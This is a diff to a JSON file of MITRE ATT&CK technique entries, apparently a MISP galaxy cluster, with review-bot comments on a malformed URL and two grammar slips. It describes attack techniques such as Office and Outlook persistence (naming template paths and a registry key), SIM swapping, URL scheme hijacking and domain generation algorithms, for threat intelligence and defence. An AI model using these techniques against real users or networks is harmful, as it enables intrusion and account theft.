@@ -5187,7 +5383,7 @@ "value": "Disabling Security Tools - T1089" }, { - "description": "User Interface Spoofing can be used to trick users into providing sensitive information, such as account credentials, bank account information, or Personally Identifiable Information (PII) to an unintended entity.\n\nAt least three methods exist to perform User Interface Spoofing:\n\nFirst, on both Android and iOS, an adversary could impersonate the user interface of a legitimate app or device function to trick a user into entering sensitive information. The constrained display size of mobile devices (compared to traditional PC displays) may impair the ability to provide the user with contextual information (for example, displaying a full web site address) that may alert the user to a potential issue. (Citation: Felt-PhishingOnMobileDevices) As described by PRE-ATT&CK ([Spearphishing for information](https://attack.mitre.org/techniques/T1397)), it is also possible for an adversary to carry out this form of the technique without a direct adversary presence on the mobile devices, e.g. through a spoofed web page.\n\nSecond, on both Android and iOS, a malicious app could impersonate the identity of another app (e.g. use the same app name and/or icon) and somehow get installed on the device (e.g. using [Deliver Malicious App via Authorized App Store](https://attack.mitre.org/techniques/T1475) or [Deliver Malicious App via Other Means](https://attack.mitre.org/techniques/T1476). The malicious app could then prompt the user for sensitive information. (Citation: eset-finance)\n\nThird, on older versions of Android, a malicious app could abuse mobile operating system features to interfere with a running legitimate app. 
(Citation: Felt-PhishingOnMobileDevices) (Citation: Hassell-ExploitingAndroid) However, this technique appears to have been addressed starting in Android 5.0 with the deprecation of the Android's ActivityManager.getRunningTasks method and modification of its behavior (Citation: Android-getRunningTasks) and further addressed in Android 5.1.1 (Citation: StackOverflow-getRunningAppProcesses) to prevent a malicious app from determining what app is currently in the foreground.", + "description": "User Interface Spoofing can be used to trick users into providing sensitive information, such as account credentials, bank account information, or Personally Identifiable Information (PII) to an unintended entity.\n\n### Impersonate User Interface of Legitimate App or Device Function\n\nOn both Android and iOS, an adversary could impersonate the user interface of a legitimate app or device function to trick a user into entering sensitive information. The constrained display size of mobile devices (compared to traditional PC displays) may impair the ability to provide the user with contextual information (for example, displaying a full web site address) that may alert the user to a potential issue. (Citation: Felt-PhishingOnMobileDevices) As described by PRE-ATT&CK ([Spearphishing for Information](https://attack.mitre.org/techniques/T1397)), it is also possible for an adversary to carry out this form of the technique without a direct adversary presence on the mobile devices, e.g. through a spoofed web page.\n\n### Impersonate Identity of Legitimate App\n\nOn both Android and iOS, a malicious app could impersonate the identity of another app (e.g. use the same app name and/or icon) and somehow get installed on the device (e.g. using [Deliver Malicious App via Authorized App Store](https://attack.mitre.org/techniques/T1475) or [Deliver Malicious App via Other Means](https://attack.mitre.org/techniques/T1476)). The malicious app could then prompt the user for sensitive information. 
(Citation: eset-finance)\n\n### Abuse OS Features to Interfere with Legitimate App\n\nOn older versions of Android, a malicious app could abuse mobile operating system features to interfere with a running legitimate app. (Citation: Felt-PhishingOnMobileDevices) (Citation: Hassell-ExploitingAndroid) However, this technique appears to have been addressed starting in Android 5.0 with the deprecation of the Android's ActivityManager.getRunningTasks method and modification of its behavior (Citation: Android-getRunningTasks) and further addressed in Android 5.1.1 (Citation: StackOverflow-getRunningAppProcesses) to prevent a malicious app from determining what app is currently in the foreground.", "meta": { "external_id": "APP-31", "kill_chain": [ @@ -5201,9 +5397,9 @@ "https://attack.mitre.org/techniques/T1411", "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html", "http://w2spconf.com/2011/papers/felt-mobilephishing.pdf", + "https://www.welivesecurity.com/2018/09/19/fake-finance-apps-google-play-target-around-world/", "https://developer.android.com/reference/android/app/ActivityManager.html#getRunningTasks%28int%29", - "http://stackoverflow.com/questions/30619349/android-5-1-1-and-above-getrunningappprocesses-returns-my-application-packag", - "https://www.welivesecurity.com/2018/09/19/fake-finance-apps-google-play-target-around-world/" + "http://stackoverflow.com/questions/30619349/android-5-1-1-and-above-getrunningappprocesses-returns-my-application-packag" ] }, "uuid": "3dd58c80-4c2e-458c-9503-1b2cd273c4d2", 
@@ -5437,11 +5633,12 @@ "value": "Remote Access Tools - T1219" }, { - "description": "Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1028) can also be used externally.\n\nAdversaries may use remote services to access and persist within a network. (Citation: Volexity Virtual Private Keylogging) Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network. Access to remote services may be used as part of [Redundant Access](https://attack.mitre.org/techniques/T1108) during an operation.", + "description": "Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1028) can also be used externally.\n\nAdversaries may use remote services to initially access and/or persist within a network. (Citation: Volexity Virtual Private Keylogging) Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network. 
Access to remote services may be used as part of [Redundant Access](https://attack.mitre.org/techniques/T1108) during an operation.",
 "meta": {
 "external_id": "T1133",
 "kill_chain": [
- "mitre-attack:persistence"
+ "mitre-attack:persistence",
+ "mitre-attack:initial-access"
 ],
 "mitre_data_sources": [
 "Authentication logs"
@@ -5531,7 +5728,7 @@ "value": "Network Share Discovery - T1135" }, { - "description": "Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started.\n\n### Office Template Macros\n\nMicrosoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)\n\nOffice Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can inserted into the base templated and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded. (Citation: enigma0x3 normal.dotm) (Citation: Hexacorn Office Template Macros)\n\nWord Normal.dotm location:C:\\Users\\(username)\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel Personal.xlsb location:C:\\Users\\(username)\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAn adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.\n\n### Office Test\n\nA Registry location was found that when a DLL reference was placed within it the corresponding DLL pointed to by the binary path would be executed every time an Office application is started (Citation: Hexacorn Office Test)\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf\n\n### Add-ins\n\nOffice add-ins can be used to add functionality to Office programs. 
(Citation: Microsoft Office Add-ins)\n\nAdd-ins can also be used to obtain persistence because they can be set to execute code when an Office application starts. There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), and Visual Studio Tools for Office (VSTO) add-ins. (Citation: MRWLabs Office Persistence Add-ins)", + "description": "Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started.\n\n### Office Template Macros\n\nMicrosoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)\n\nOffice Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can inserted into the base templated and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded. 
(Citation: enigma0x3 normal.dotm) (Citation: Hexacorn Office Template Macros)\n\nWord Normal.dotm location:C:\\Users\\(username)\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel Personal.xlsb location:C:\\Users\\(username)\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAn adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.\n\n### Office Test\n\nA Registry location was found that when a DLL reference was placed within it the corresponding DLL pointed to by the binary path would be executed every time an Office application is started (Citation: Hexacorn Office Test)\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf\n\n### Add-ins\n\nOffice add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins)\n\nAdd-ins can also be used to obtain persistence because they can be set to execute code when an Office application starts. There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)\n\n### Outlook Rules, Forms, and Home Page\n\nA variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) \n\nOutlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. 
Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)\n\nOutlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook Forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)\n\nOutlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)\n\nTo abuse these features, an adversary requires prior access to the user’s Outlook mailbox, either via an Exchange/OWA server or via the client application. Once malicious rules, forms, or Home Pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded while malicious rules and forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)(Citation: SensePost Outlook Forms)(Citation: SensePost Outlook Home Page)", "meta": { "external_id": "T1137", "kill_chain": [ 
@@ -5554,7 +5751,16 @@ "http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/", "http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/", "https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460", - "https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/" + "https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf", + "https://github.com/sensepost/ruler", + "https://silentbreaksecurity.com/malicious-outlook-rules/", + "https://sensepost.com/blog/2017/outlook-forms-and-shells/", + "https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/", + "https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746", + "https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943", + "https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack", + "https://github.com/sensepost/notruler" ] }, "uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", 
@@ -5579,14 +5785,14 @@ ], "refs": [ "https://attack.mitre.org/techniques/T1173", + "https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/", + "https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021", "https://technet.microsoft.com/library/security/4053440", - "https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/", - "https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/", "https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/", "https://www.contextis.com/blog/comma-separated-vulnerabilities", - "https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/", "https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee", - "https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021" + "https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/", + "https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/" ] }, "uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", 
@@ -5627,7 +5833,7 @@ "value": "Capture Clipboard Data - T1414" }, { - "description": "An adversary could convince the mobile network operator (e.g. through social networking, forged identification, or insider attacks performed by trusted employees) to issue a new SIM card and associate it with an existing phone number and account (Citation: NYGov-Simswap) (Citation: Motherboard-Simswap2). The adversary could then obtain SMS messages or hijack phone calls intended for someone else (Citation: Betanews-Simswap). \n\nOne use case is intercepting authentication messages or phone calls to obtain illicit access to online banking or other online accounts, as many online services allow account password resets by sending an authentication code over SMS to a phone number associated with the account (Citation: Guardian-Simswap) (Citation: Motherboard-Simswap1).", + "description": "An adversary could convince the mobile network operator (e.g. through social networking, forged identification, or insider attacks performed by trusted employees) to issue a new SIM card and associate it with an existing phone number and account (Citation: NYGov-Simswap) (Citation: Motherboard-Simswap2). The adversary could then obtain SMS messages or hijack phone calls intended for someone else (Citation: Betanews-Simswap). \n\nOne use case is intercepting authentication messages or phone calls to obtain illicit access to online banking or other online accounts, as many online services allow account password resets by sending an authentication code over SMS to a phone number associated with the account (Citation: Guardian-Simswap) (Citation: Motherboard-Simswap1)(Citation: Krebs-SimSwap)(Citation: TechCrunch-SimSwap).", "meta": { "external_id": "STA-22", "kill_chain": [ 
@@ -5641,17 +5847,19 @@ "https://attack.mitre.org/techniques/T1451", "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-22.html", "http://www.dos.ny.gov/consumerprotection/scams/att-sim.html", + "https://motherboard.vice.com/en_us/article/3ky5a5/criminals-recruit-telecom-employees-sim-swapping-port-out-scam", "http://betanews.com/2016/02/12/everything-you-need-to-know-about-sim-swap-scams/", "https://www.theguardian.com/money/2016/apr/16/sim-swap-fraud-mobile-banking-fraudsters", - "https://motherboard.vice.com/en_us/article/3ky5a5/criminals-recruit-telecom-employees-sim-swapping-port-out-scam", - "https://motherboard.vice.com/en_us/article/vbqax3/hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin" + "https://motherboard.vice.com/en_us/article/vbqax3/hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin", + "https://krebsonsecurity.com/2018/05/t-mobile-employee-made-unauthorized-sim-swap-to-steal-instagram-account/", + "https://techcrunch.com/2017/08/23/i-was-hacked/" ] }, "uuid": "a64a820a-cb21-471f-920c-506a2ff04fa5", "value": "SIM Card Swap - T1451" }, { - "description": "An iOS application may be able to maliciously claim a URL scheme, allowing it to intercept calls that are meant for a different application. This technique, for example, could be used to capture OAuth authorization codes as described in (Citation: IETF-PKCE) or to phish user credentials as described in (Citation: MobileIron-XARA). Related potential security implications are described in (Citation: Dhanjani-URLScheme). FireEye researchers describe URL scheme hijacking in a blog post (Citation: FireEye-Masque2), including evidence of its use.", + "description": "An iOS application may be able to maliciously claim a URL scheme, allowing it to intercept calls that are meant for a different application(Citation: FireEye-Masque2)(Citation: Dhanjani-URLScheme). 
This technique, for example, could be used to capture OAuth authorization codes(Citation: IETF-PKCE) or to phish user credentials(Citation: MobileIron-XARA).", "meta": { "external_id": "AUT-10", "kill_chain": [ @@ -5663,17 +5871,17 @@ "refs": [ "https://attack.mitre.org/techniques/T1415", "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-10.html", - "https://tools.ietf.org/html/rfc7636", - "https://www.mobileiron.com/en/smartwork-blog/ios-url-scheme-hijacking-xara-attack-analysis-and-countermeasures", + "https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html", "http://www.dhanjani.com/blog/2010/11/insecure-handling-of-url-schemes-in-apples-ios.html", - "https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html" + "https://tools.ietf.org/html/rfc7636", + "https://www.mobileiron.com/en/smartwork-blog/ios-url-scheme-hijacking-xara-attack-analysis-and-countermeasures" ] }, "uuid": "8f142a25-f6c3-4520-bd50-2ae3ab50ed3e", "value": "URL Scheme Hijacking - T1415" }, { - "description": "A malicious app can register to receive intents meant for other applications and may then be able to receive sensitive values such as OAuth authorization codes as described in (Citation: IETF-PKCE).", + "description": "A malicious app can register to receive intents meant for other applications and may then be able to receive sensitive values such as OAuth authorization codes(Citation: IETF-PKCE).", "meta": { "external_id": "T1416", "kill_chain": [ 
@@ -5780,7 +5988,7 @@ "value": "Spearphishing via Service - T1194" }, { - "description": "Supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images (multiple cases of removable media infected at the factory)\n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011)", + "description": "Supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. 
\n\nSupply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of source code in open-source dependencies\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images (multiple cases of removable media infected at the factory)\n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)", "meta": { "external_id": "CAPEC-439", "kill_chain": [ 
@@ -5800,10 +6008,11 @@ "https://capec.mitre.org/data/definitions/437.html", "https://capec.mitre.org/data/definitions/438.html", "https://capec.mitre.org/data/definitions/439.html", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities", "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/", - "https://www.commandfive.com/papers/C5_APT_SKHack.pdf" + "https://www.commandfive.com/papers/C5_APT_SKHack.pdf", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets" ] }, "uuid": "3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", 
@@ -6261,7 +6470,7 @@ "value": "Conduct active scanning - T1254" }, { - "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, and architecture.\n\nOn Android, much of this information is programmatically accessible to applications through the android.os.Build class (Citation: Android-Build).\n\nOn iOS, techniques exist for applications to programmatically access this information, for example as described in (Citation: StackOverflow-iOSVersion).", + "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, and architecture.\n\nOn Android, much of this information is programmatically accessible to applications through the android.os.Build class(Citation: Android-Build).\n\nOn iOS, techniques exist for applications to programmatically access this information(Citation: StackOverflow-iOSVersion).", "meta": { "external_id": "T1426", "kill_chain": [ 
@@ -6310,6 +6519,34 @@ "uuid": "78e41091-d10d-4001-b202-89612892b6ff", "value": "Identify supply chains - T1246" }, + { + "description": "Adversaries may attempt to gather information on domain trust relationships that may be used to identify [Lateral Movement](https://attack.mitre.org/tactics/TA0008) opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1178), [Pass the Ticket](https://attack.mitre.org/techniques/T1097), and [Kerberoasting](https://attack.mitre.org/techniques/T1208).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)", + "meta": { + "external_id": "T1482", + "kill_chain": [ + "mitre-attack:discovery" + ], + "mitre_data_sources": [ + "PowerShell logs", + "API monitoring", + "Process command-line parameters", + "Process monitoring" + ], + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1482", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10)", + "https://adsecurity.org/?p=1588", + "http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ ", + "https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/", + 
"https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships" + ] + }, + "uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "value": "Domain Trust Discovery - T1482" + }, { "description": "Adversaries may attempt to exploit enterprise servers, workstations, or other resources over the network. This technique may take advantage of the mobile device's access to an internal enterprise network either through local connectivity or through a Virtual Private Network (VPN).", "meta": { 
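Review bot: The new T1482 entry carries a trailing space inside one of its `refs` strings, `"http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ "`, which survives JSON validation but yields a malformed link for any consumer that uses the value verbatim (MISP galaxy UI, de-duplication against the same URL without the space, or a link checker). It should be `"http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/"`. If this cluster file is regenerated from the upstream ATT&CK STIX data, as its structure suggests, the fix belongs in the upstream external_references as well, otherwise the next regeneration will reintroduce the stray space.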
@@ -6359,6 +6596,31 @@ "uuid": "74a3288e-eee9-4f8e-973a-fbc128e033f1", "value": "Conduct social engineering - T1249" }, + { + "description": "Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. \n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "meta": { + "external_id": "T1492", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "Application logs", + "File monitoring" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1492", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.justice.gov/opa/press-release/file/1092091/download" + ] + }, + "uuid": "0bf78622-e8d2-41da-a857-731472d61a92", + "value": "Stored Data Manipulation - T1492" + }, { "description": "Supply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit the people, their positions, and relationships, that are part of the supply chain. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain)", "meta": { 
@@ -6575,7 +6837,7 @@ "value": "Remotely Install Application - T1443" }, { - "description": "A malicious app could abuse Android's accessibility features to capture sensitive data or perform other malicious actions, as demonstrated in a proof of concept created by Skycure (Citation: Skycure-Accessibility).", + "description": "A malicious app could abuse Android's accessibility features to capture sensitive data or perform other malicious actions(Citation: Skycure-Accessibility).", "meta": { "external_id": "T1453", "kill_chain": [ 
@@ -6665,6 +6927,42 @@ "uuid": "3911658a-6506-4deb-9ab4-595a51ae71ad", "value": "Commonly Used Port - T1436" }, + { + "description": "Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)\n\nDGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)\n\nAdversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). 
When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)", + "meta": { + "external_id": "T1483", + "kill_chain": [ + "mitre-attack:command-and-control" + ], + "mitre_data_sources": [ + "Process use of network", + "Packet capture", + "Network device logs", + "Netflow/Enclave netflow", + "DNS records" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1483", + "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf", + "https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/", + "https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/", + "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html", + "https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html", + "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html", + "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", + "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/", + "http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf", + "https://arxiv.org/pdf/1611.00791.pdf" + ] + }, + "uuid": "54456690-84de-4538-9101-643e26437e09", + "value": "Domain Generation Algorithms - T1483" + }, { "description": "Adversaries can communicate using cellular networks rather than enterprise Wi-Fi in order to bypass enterprise network monitoring systems. Adversaries may also communicate using other non-Internet Protocol mediums such as SMS, NFC, or Bluetooth to bypass network monitoring systems.", "meta": { 
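Review bot: The T1483 description added in this hunk has a grammatical slip, "making it much harder for defenders block, track, or take over", which should read `"making it much harder for defenders to block, track, or take over"`. The T1493 description in the next hunk has the same kind of slip, "where there is an opportunity deploy a tool", which should read `"where there is an opportunity to deploy a tool"`. Both strings appear to be mirrored from ATT&CK, so if this file is produced by a generator the wording is best corrected upstream and then regenerated rather than patched by hand here.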
@@ -6685,6 +6983,31 @@ "uuid": "b3c2e5de-0941-4b57-ba61-af029eb5517a", "value": "Alternate Network Mediums - T1438" }, + { + "description": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making. \n\nManipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "meta": { + "external_id": "T1493", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "Packet capture", + "Network protocol analysis" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1493", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.justice.gov/opa/press-release/file/1092091/download" + ] + }, + "uuid": "cc1e737c-236c-4e3b-83ba-32039a626ef8", + "value": "Transmitted Data Manipulation - T1493" + }, { "description": "Callbacks are malware communications seeking instructions. An adversary will test their malware to ensure the appropriate instructions are conveyed and the callback software can be reached. (Citation: LeeBeaconing)", "meta": { 
